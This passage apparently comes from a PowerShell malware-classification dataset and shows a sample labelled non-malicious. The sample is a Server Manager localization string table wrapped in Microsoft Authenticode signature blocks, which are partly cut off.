UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO # Ojg2REYtNEJCQy05MzM1MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNloIIRejCCBycwggUPoAMCAQICEzMAAAHdXVcdldStqhsAAQAAAd0wDQYJ # KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx # MDEyMTkwNzA5WhcNMjUwMTEwMTkwNzA5WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl # cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjo4NkRGLTRC # QkMtOTMzNTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKhOA5RE6i53nHURH4lnfKLp # +9JvipuTtctairCxMUSrPSy5CWK2DtriQP+T52HXbN2g7AktQ1pQZbTDGFzK6d03 # vYYNrCPuJK+PRsP2FPVDjBXy5mrLRFzIHHLaiAaobE5vFJuoxZ0ZWdKMCs8acjhH # UmfaY+79/CR7uN+B4+xjJqwvdpU/mp0mAq3earyH+AKmv6lkrQN8zgrcbCgHwsqv # vqT6lEFqYpi7uKn7MAYbSeLe0pMdatV5EW6NVnXMYOTRKuGPfyfBKdShualLo88k # G7qa2mbA5l77+X06JAesMkoyYr4/9CgDFjHUpcHSODujlFBKMi168zRdLerdpW0b # BX9EDux2zBMMaEK8NyxawCEuAq7++7ktFAbl3hUKtuzYC1FUZuUl2Bq6U17S4CKs # qR3itLT9qNcb2pAJ4jrIDdll5Tgoqef5gpv+YcvBM834bXFNwytd3ujDD24P9Dd8 # xfVJvumjsBQQkK5T/qy3HrQJ8ud1nHSvtFVi5Sa/ubGuYEpS8gF6GDWN5/KbveFk # dsoTVIPo8pkWhjPs0Q7nA5+uBxQB4zljEjKz5WW7BA4wpmFm24fhBmRjV4Nbp+n7 # 8cgAjvDSfTlA6DYBcv2kx1JH2dIhaRnSeOXePT6hMF0Il598LMu0rw35ViUWcAQk # UNUTxRnqGFxz5w+ZusMDAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQUbqL1toyPUdpF # yyHSDKWj0I4lw/EwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD # VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j # cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG # CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw # MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD # CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBAC5U2bINLgXIHWbM # cqVuf9jkUT/K8zyLBvu5h8JrqYR2z/eaO2yo1Ooc9Shyvxbe9GZDu7kkUzxSyJ1I # ZksZZw6FDq6yZNT3PEjAEnREpRBL8S+mbXg+O4VLS0LSmb8XIZiLsaqZ0fDEcv3H # eA+/y/qKnCQWkXghpaEMwGMQzRkhGwcGdXr1zGpQ7HTxvfu57xFxZX1MkKnWFENJ # 6urd+4teUgXj0ngIOx//l3XMK3Ht8T2+zvGJNAF+5/5qBk7nr079zICbFXvxtidN # N5eoXdW+9rAIkS+UGD19AZdBrtt6dZ+OdAquBiDkYQ5kVfUMKS31yHQOGgmFxuCO # zTpWHalrqpdIllsy8KNsj5U9sONiWAd9PNlyEHHbQZDmi9/BNlOYyTt0YehLbDov # mZUNazk79Od/A917mqCdTqrExwBGUPbMP+/vdYUqaJspupBnUtjOf/76DAhVy8e/ # e6zR98PkplmliO2brL3Q3rD6+ZCVdrGM9Rm6hUDBBkvYh+YjmGdcQ5HB6WT9Rec8 # +qDHmbhLhX4Zdaard5/OXeLbgx2f7L4QQQj3KgqjqDOWInVhNE1gYtTWLHe4882d # /k7Lui0K1g8EZrKD7maOrsJLKPKlegceJ9FCqY1sDUKUhRa0EHUW+ZkKLlohKrS7 # FwjdrINWkPBgbQznCjdE2m47QjTbMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ # mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 # WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK # NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg # fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp # rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d # vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9 # 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR # Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu # qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO # ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb # oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 # bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t # AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW # BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb # UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku # aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA # QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2 # VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu # bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw # LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93 # d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt # MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q # XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6 # U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt # I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis # 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp # kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0 # sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e # W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ # sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 # Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0 # dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ # tB1VM1izoXBm8qGCAtYwggI/AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh # bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjo4 # NkRGLTRCQkMtOTMzNTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy # dmljZaIjCgEBMAcGBSsOAwIaAxUANiNHGWXbNaDPxnyiDbEOciSjFhCggYMwgYCk # fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF # AOn4cykwIhgPMjAyNDA1MjIyMTM1MzdaGA8yMDI0MDUyMzIxMzUzN1owdjA8Bgor # BgEEAYRZCgQBMS4wLDAKAgUA6fhzKQIBADAJAgEAAgEIAgH/MAcCAQACAhFkMAoC # BQDp+cSpAgEAMDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEA # AgMHoSChCjAIAgEAAgMBhqAwDQYJKoZIhvcNAQEFBQADgYEAOeDuqQv2rt9hnyKt # xmvq5WkHYrFGaoFDrBwwGrXPwqgN8JdkXVBWIDzkqJqV3kYS3Ji7mG1t05I6T1Rq # GeP4Q2o1EBtNAhn05sLAO/gLCtUImd1Z4RJ0Ks24T381hg4vGljMiE7mL0uR6t/c # m0SSLx4LbvyDikIPDGlQ1sZW3J8xggQNMIIECQIBATCBkzB8MQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGlt # ZS1TdGFtcCBQQ0EgMjAxMAITMwAAAd1dVx2V1K2qGwABAAAB3TANBglghkgBZQME # AgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJ # BDEiBCD/RvF/ZBUgf7z3gET+kYCUqPpRTTzH3SjVxlZYeCJEXjCB+gYLKoZIhvcN # AQkQAi8xgeowgecwgeQwgb0EIGH/Di2aZaxPeJmce0fRWTftQI3TaVHFj5GI43rA # MWNmMIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAHd # XVcdldStqhsAAQAAAd0wIgQgLnJVJZ7vLsXMs5FcOuTl1mmXtOKo7lEM8otypA9I # 8OYwDQYJKoZIhvcNAQELBQAEggIAAO/h+nQ4n6E/DHLc9XdJLGmDgfHwbHorkfZy # uKFuSsXHzdX83uKBaucAlVhdvx2JXjPOfH6oRMHfwvNJCxFrrU/rgV4nYwKAknyt # EXFZcBN5d/pQe5cinZJfwMJXKqyJqFpQOTXNhIBOJb9PvvJZvEIvIzsdWcC9knlV # mRqTnha2FyVbRpFUn+3XbQHy5ZuG9qpGS6WDNbjsf+LuvbG5ZU6FYL7hyP8NaxGZ # tXC0GNmDZSnwmvryZaH7UqF3S7TV3Z6txrITwSw32ZCEAtzME9qOO4Xoi2wLvD/l # aessFPpORLlMV0Xf6oGWei5rtWG1N5/g5XAlWB2SWR5Y1TbmC+MEiZSViNzGlAmZ # PNPBZ9YniVZ2eInVZ88z4RfTErSFH/Nq4juXV0oXfJREeY6e4zSWiFUKVzyuylvv # ZLjBS74XG9Pr72x6dcf5p0mztZNZwCp24uFd0sthZbtXRJPOB+1SeHmH+Z3+unUI # U5P8DPCs7K8Dt5NrGtduHjl7RSQiN4hFPzYPeEM01ZJBu9AophXDavjBN9iGHJq4 # hpBOBa+6V6EAyOlIO0mL4FcVWy/t/tx2w9C96TIgl+/K28D9h6JcjTPCtORqI/ES # q03eyC94QbTAF2eVQIDJYr7bo8oI2BPUsOQAYs3H75mHJ9fRWwGMdZwqEmrs3g3/ # KCxsWXk= # SIG # End signature block
combined_dataset/train/non-malicious/sample_9_38.ps1
sample_9_38.ps1
ConvertFrom-StringData @' id_servermanagerinfo=Server Manager Information id_servermanagerobtaining=Obtaining Server Manager logs and role information id_servermanageroclist=Optional Components list (oclist) '@ # SIG # Begin signature block # MIIoRgYJKoZIhvcNAQcCoIIoNzCCKDMCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDZUsAAPH0D09Vv # zSE0jcoPBSgr4w2wPtd9Kdk/GsnxrKCCDXYwggX0MIID3KADAgECAhMzAAAEBGx0 # Bv9XKydyAAAAAAQEMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTE0WhcNMjUwOTExMjAxMTE0WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQC0KDfaY50MDqsEGdlIzDHBd6CqIMRQWW9Af1LHDDTuFjfDsvna0nEuDSYJmNyz # NB10jpbg0lhvkT1AzfX2TLITSXwS8D+mBzGCWMM/wTpciWBV/pbjSazbzoKvRrNo # DV/u9omOM2Eawyo5JJJdNkM2d8qzkQ0bRuRd4HarmGunSouyb9NY7egWN5E5lUc3 # a2AROzAdHdYpObpCOdeAY2P5XqtJkk79aROpzw16wCjdSn8qMzCBzR7rvH2WVkvF # HLIxZQET1yhPb6lRmpgBQNnzidHV2Ocxjc8wNiIDzgbDkmlx54QPfw7RwQi8p1fy # 4byhBrTjv568x8NGv3gwb0RbAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU8huhNbETDU+ZWllL4DNMPCijEU4w # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMjkyMzAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAIjmD9IpQVvfB1QehvpC # Ge7QeTQkKQ7j3bmDMjwSqFL4ri6ae9IFTdpywn5smmtSIyKYDn3/nHtaEn0X1NBj # L5oP0BjAy1sqxD+uy35B+V8wv5GrxhMDJP8l2QjLtH/UglSTIhLqyt8bUAqVfyfp # h4COMRvwwjTvChtCnUXXACuCXYHWalOoc0OU2oGN+mPJIJJxaNQc1sjBsMbGIWv3 # cmgSHkCEmrMv7yaidpePt6V+yPMik+eXw3IfZ5eNOiNgL1rZzgSJfTnvUqiaEQ0X # dG1HbkDv9fv6CTq6m4Ty3IzLiwGSXYxRIXTxT4TYs5VxHy2uFjFXWVSL0J2ARTYL # E4Oyl1wXDF1PX4bxg1yDMfKPHcE1Ijic5lx1KdK1SkaEJdto4hd++05J9Bf9TAmi # u6EK6C9Oe5vRadroJCK26uCUI4zIjL/qG7mswW+qT0CW0gnR9JHkXCWNbo8ccMk1 # sJatmRoSAifbgzaYbUz8+lv+IXy5GFuAmLnNbGjacB3IMGpa+lbFgih57/fIhamq # 5VhxgaEmn/UjWyr+cPiAFWuTVIpfsOjbEAww75wURNM1Imp9NJKye1O24EspEHmb # DmqCUcq7NqkOKIG4PVm3hDDED/WQpzJDkvu4FrIbvyTGVU01vKsg4UfcdiZ0fQ+/ # V0hf8yrtq9CkB8iIuk5bBxuPMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGiYwghoiAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAQEbHQG/1crJ3IAAAAABAQwDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIHZLg725EP+uD1zR5EcI0IuX # IF6yDRsrWRWtTfv1JA4yMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAnTuCBG5Q6ILj5QJaGx7IFjhkZ7NbtbtRWa0eXxwEGzEB5yPQfJJFByJ5 # K1vLMCFTEUwhm3edg2sSO+pAhMpup25QKT0G9JISnwgSgMWmvAcifU0xZ89FgNEB # JBdHYDrJmsfCG1XWj402ufl4QLjXK57RDo9UhjMXn3Ej2nTGwlUyuKsXPnAU+Y5e # CvkHkKSuylxWSWtKbnje0jVO/Jw6v5ltwuWf9ZY3AdL++c4vEE9OrlsW5LHchNFf # 8ESlw7ysD0fLlblh/WypmqmQhiyMxsMZqon3wCK7pTooQaA8G209WB/qXfKLordQ # aJ0vSN4Rt1fpXKz/LcAB2o/XZJOkG6GCF7AwghesBgorBgEEAYI3AwMBMYIXnDCC # F5gGCSqGSIb3DQEHAqCCF4kwgheFAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFaBgsq # hkiG9w0BCRABBKCCAUkEggFFMIIBQQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCCMfIxvD/r/MVqA7UVIIXB9/MkDg6h960h6AuWik9/K2wIGZutC6/TG # GBMyMDI0MTAyODExNDA0Mi41MTZaMASAAgH0oIHZpIHWMIHTMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT # Tjo0MDFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg # U2VydmljZaCCEf4wggcoMIIFEKADAgECAhMzAAAB/tCowns0IQsBAAEAAAH+MA0G # CSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u # MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp # b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMB4XDTI0 # MDcyNTE4MzExOFoXDTI1MTAyMjE4MzExOFowgdMxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9w # ZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjQwMUEt # MDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNl # MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvLwhFxWlqA43olsE4PCe # gZ4mSfsH2YTSKEYv8Gn3362Bmaycdf5T3tQxpP3NWm62YHUieIQXw+0u4qlay4AN # 3IonI+47Npi9fo52xdAXMX0pGrc0eqW8RWN3bfzXPKv07O18i2HjDyLuywYyKA9F # mWbePjahf9Mwd8QgygkPtwDrVQGLyOkyM3VTiHKqhGu9BCGVRdHW9lmPMrrUlPWi # YV9LVCB5VYd+AEUtdfqAdqlzVxA53EgxSqhp6JbfEKnTdcfP6T8Mir0HrwTTtV2h # 2yDBtjXbQIaqycKOb633GfRkn216LODBg37P/xwhodXT81ZC2aHN7exEDmmbiWss # jGvFJkli2g6dt01eShOiGmhbonr0qXXcBeqNb6QoF8jX/uDVtY9pvL4j8aEWS49h # KUH0mzsCucIrwUS+x8MuT0uf7VXCFNFbiCUNRTofxJ3B454eGJhL0fwUTRbgyCbp # LgKMKDiCRub65DhaeDvUAAJT93KSCoeFCoklPavbgQyahGZDL/vWAVjX5b8Jzhly # 9gGCdK/qi6i+cxZ0S8x6B2yjPbZfdBVfH/NBp/1Ln7xbeOETAOn7OT9D3UGt0q+K # iWgY42HnLjyhl1bAu5HfgryAO3DCaIdV2tjvkJay2qOnF7Dgj8a60KQT9QgfJfwX # 